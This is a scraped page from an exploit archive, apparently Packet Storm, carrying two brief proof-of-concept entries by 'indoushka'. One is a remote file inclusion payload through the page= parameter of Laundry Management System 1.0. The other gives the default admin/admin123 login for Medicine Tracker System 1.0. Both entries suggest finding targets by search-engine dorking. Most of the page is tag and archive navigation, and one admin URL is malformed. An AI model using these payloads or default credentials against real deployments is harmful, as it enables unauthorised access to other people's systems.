    =============================================================================================================================================| # Title     : Laundry Management System 1.0 File inclusion Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/online-laundry-management-system-source-code/?wpdmdl=6058&refresh=66bbd3015dcfe1723585281     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : /index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg[+] http://127.0.0.1/laundry_Management_System/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,567)
*   Arbitrary (16,906)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,840)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,123)
*   Encryption (2,389)
*   Exploit (53,308)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,227)
*   Proof of Concept (2,396)
*   Protocol (3,731)
*   Python (1,648)
*   Remote (31,704)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,023)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,919)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,636)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,782)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,677)
*   Other

Laundry Management System 1.0 Remote File Inclusion

Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.

**Medicine Tracker System 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | f581303aa2bf9febcf6dcf7c6c3d3a00468a34461c28597369ee71c12e489cbd

Download | Favorite | View

**Medicine Tracker System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Medicine Tracker System v1.0 Insecure Settings Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Tag

#ruby